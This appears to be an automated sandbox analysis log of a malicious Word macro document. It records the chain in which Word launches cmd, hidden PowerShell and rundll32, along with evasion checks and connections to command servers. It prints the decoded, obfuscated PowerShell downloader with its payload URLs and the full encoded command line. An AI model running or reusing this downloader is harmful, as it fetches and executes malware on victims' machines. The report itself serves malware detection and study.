                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: powershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F6AB2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007176B2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196AB2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001A6AB2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002676B2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002276B2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F76B2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001E6AB2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_001E6AB2 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.187.222.40 80
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 184.66.18.83 80
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 167.71.148.58 187
                    Encrypted powershell cmdline option foundShow sources
                    Source: unknownProcess created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgA